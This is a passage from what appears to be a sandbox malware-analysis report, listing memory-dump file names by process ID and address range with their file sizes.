                                                                                                                                                                                                          • memory/1828-673-0x0000000005B60000-0x0000000006106000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            5.6MB

                                                                                                                                                                                                          • memory/1828-674-0x0000000005650000-0x00000000056E2000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            584KB

                                                                                                                                                                                                          • memory/1828-679-0x0000000005630000-0x000000000563A000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            40KB

                                                                                                                                                                                                          • memory/1828-778-0x0000000007680000-0x000000000769A000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            104KB

                                                                                                                                                                                                          • memory/1844-498-0x00000000006C0000-0x0000000000714000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            336KB

                                                                                                                                                                                                          • memory/1844-554-0x0000000000400000-0x0000000000460000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            384KB

                                                                                                                                                                                                          • memory/1872-27-0x0000000005980000-0x00000000059E6000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            408KB

                                                                                                                                                                                                          • memory/1872-23-0x0000000002A30000-0x0000000002A66000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            216KB

                                                                                                                                                                                                          • memory/1872-25-0x0000000005040000-0x0000000005062000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            136KB

                                                                                                                                                                                                          • memory/1872-26-0x0000000005910000-0x0000000005976000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            408KB

                                                                                                                                                                                                          • memory/1872-24-0x0000000005230000-0x000000000585A000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            6.2MB

                                                                                                                                                                                                          • memory/1872-38-0x0000000005F10000-0x0000000005F5C000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            304KB

                                                                                                                                                                                                          • memory/1872-37-0x0000000005EF0000-0x0000000005F0E000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            120KB

                                                                                                                                                                                                          • memory/1872-33-0x00000000059F0000-0x0000000005D47000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            3.3MB

                                                                                                                                                                                                          • memory/1948-555-0x0000000000400000-0x0000000000460000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            384KB

                                                                                                                                                                                                          • memory/1948-499-0x0000000000D20000-0x0000000000D74000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            336KB

                                                                                                                                                                                                          • memory/2088-334-0x0000024BE55C0000-0x0000024BE64A8000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            14.9MB

                                                                                                                                                                                                          • memory/2152-358-0x0000000035280000-0x0000000035290000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            64KB

                                                                                                                                                                                                          • memory/2344-468-0x0000000000400000-0x0000000000460000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            384KB

                                                                                                                                                                                                          • memory/2344-398-0x0000000000D50000-0x0000000000DA4000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            336KB

                                                                                                                                                                                                          • memory/2656-1817-0x0000000000F70000-0x000000000142E000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            4.7MB

                                                                                                                                                                                                          • memory/2656-1765-0x0000000000F70000-0x000000000142E000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            4.7MB

                                                                                                                                                                                                          • memory/2680-531-0x0000000000D60000-0x0000000000DC1000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            388KB

                                                                                                                                                                                                          • memory/2680-397-0x0000000000AB0000-0x0000000000AB3000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            12KB

                                                                                                                                                                                                          • memory/2680-467-0x0000000000400000-0x0000000000460000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            384KB

                                                                                                                                                                                                          • memory/2680-395-0x0000000000B00000-0x0000000000B54000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            336KB

                                                                                                                                                                                                          • memory/2680-396-0x0000000000D60000-0x0000000000DC1000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            388KB

                                                                                                                                                                                                          • memory/2688-134-0x00000000058A0000-0x0000000005BF7000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            3.3MB

                                                                                                                                                                                                          • memory/2688-136-0x0000000006380000-0x00000000063CC000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            304KB

                                                                                                                                                                                                          • memory/2708-437-0x00000000001F0000-0x00000000001F3000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            12KB

                                                                                                                                                                                                          • memory/2708-508-0x0000000000400000-0x0000000000460000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            384KB

                                                                                                                                                                                                          • memory/2708-436-0x0000000000D40000-0x0000000000D94000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            336KB

                                                                                                                                                                                                          • memory/2836-592-0x0000000000D20000-0x0000000000D74000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            336KB

                                                                                                                                                                                                          • memory/2912-569-0x00007FFDE20C0000-0x00007FFDE2143000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            524KB

                                                                                                                                                                                                          • memory/2912-568-0x00000000006C0000-0x0000000000714000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            336KB

                                                                                                                                                                                                          • memory/2912-571-0x00007FFDE20C0000-0x00007FFDE2143000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            524KB

                                                                                                                                                                                                          • memory/2912-570-0x0000000000400000-0x0000000000460000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            384KB

                                                                                                                                                                                                          • memory/2916-1925-0x00007FF7D0400000-0x00007FF7D0EFF000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            11.0MB

                                                                                                                                                                                                          • memory/2956-1922-0x00007FF611410000-0x00007FF611F0F000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            11.0MB

                                                                                                                                                                                                          • memory/2956-1897-0x00007FF611410000-0x00007FF611F0F000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            11.0MB

                                                                                                                                                                                                          • memory/2976-415-0x00000000006C0000-0x0000000000714000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            336KB

                                                                                                                                                                                                          • memory/2976-480-0x0000000000400000-0x0000000000460000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            384KB

                                                                                                                                                                                                          • memory/3232-2-0x00007FFDC7DF0000-0x00007FFDC88B2000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            10.8MB

                                                                                                                                                                                                          • memory/3232-14-0x00007FFDC7DF0000-0x00007FFDC88B2000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            10.8MB

                                                                                                                                                                                                          • memory/3232-1-0x0000000000290000-0x0000000000298000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            32KB

                                                                                                                                                                                                          • memory/3232-13-0x00007FFDC7DF3000-0x00007FFDC7DF5000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            8KB

                                                                                                                                                                                                          • memory/3232-0-0x00007FFDC7DF3000-0x00007FFDC7DF5000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            8KB

                                                                                                                                                                                                          • memory/3248-509-0x0000000000D30000-0x0000000000D84000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            336KB

                                                                                                                                                                                                          • memory/3248-580-0x0000000000400000-0x0000000000460000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            384KB

                                                                                                                                                                                                          • memory/3260-590-0x0000000000AB0000-0x0000000000AB3000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            12KB

                                                                                                                                                                                                          • memory/3260-589-0x0000000000D20000-0x0000000000D81000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            388KB

                                                                                                                                                                                                          • memory/3260-588-0x0000000000AB0000-0x0000000000B04000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            336KB

                                                                                                                                                                                                          • memory/3764-921-0x00000000006C0000-0x0000000000734000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            464KB

                                                                                                                                                                                                          • memory/3764-1665-0x0000000005350000-0x0000000005362000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            72KB

                                                                                                                                                                                                          • memory/3764-1730-0x0000000006620000-0x0000000006674000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            336KB

                                                                                                                                                                                                          • memory/3840-322-0x00007FF7B0F40000-0x00007FF7B2961000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            26.1MB

                                                                                                                                                                                                          • memory/3868-534-0x0000000000400000-0x0000000000460000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            384KB

                                                                                                                                                                                                          • memory/3868-469-0x0000000000D30000-0x0000000000D84000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            336KB

                                                                                                                                                                                                          • memory/4000-359-0x0000000000700000-0x000000000070E000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            56KB

                                                                                                                                                                                                          • memory/4060-479-0x0000000000D40000-0x0000000000D94000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            336KB

                                                                                                                                                                                                          • memory/4060-543-0x0000000000400000-0x0000000000460000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            384KB

                                                                                                                                                                                                          • memory/4208-470-0x0000000000AD0000-0x0000000000B24000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            336KB

                                                                                                                                                                                                          • memory/4208-535-0x0000000000400000-0x0000000000460000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            384KB

                                                                                                                                                                                                          • memory/4352-536-0x00000000009B0000-0x0000000000A04000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            336KB

                                                                                                                                                                                                          • memory/4396-447-0x00007FFDE20C0000-0x00007FFDE2143000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            524KB

                                                                                                                                                                                                          • memory/4396-448-0x0000000000400000-0x0000000000460000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            384KB

                                                                                                                                                                                                          • memory/4396-449-0x00007FFDE20C0000-0x00007FFDE2143000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            524KB

                                                                                                                                                                                                          • memory/4396-446-0x0000000000D00000-0x0000000000D54000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            336KB

                                                                                                                                                                                                          • memory/4536-154-0x0000000000400000-0x0000000000459000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            356KB

                                                                                                                                                                                                          • memory/4536-156-0x0000000000400000-0x0000000000459000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            356KB

                                                                                                                                                                                                          • memory/4892-251-0x0000000005C80000-0x0000000005CCC000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            304KB

                                                                                                                                                                                                          • memory/4892-253-0x00000000060E0000-0x00000000060FA000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            104KB

                                                                                                                                                                                                          • memory/4892-252-0x0000000007560000-0x0000000007BDA000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            6.5MB

                                                                                                                                                                                                          • memory/4912-1776-0x0000000000060000-0x0000000000072000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            72KB

                                                                                                                                                                                                          • memory/4912-1777-0x00000000009A0000-0x00000000009A6000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            24KB

                                                                                                                                                                                                          • memory/5060-591-0x0000000000400000-0x0000000000460000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            384KB

                                                                                                                                                                                                          • memory/5060-522-0x00000000006C0000-0x0000000000714000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            336KB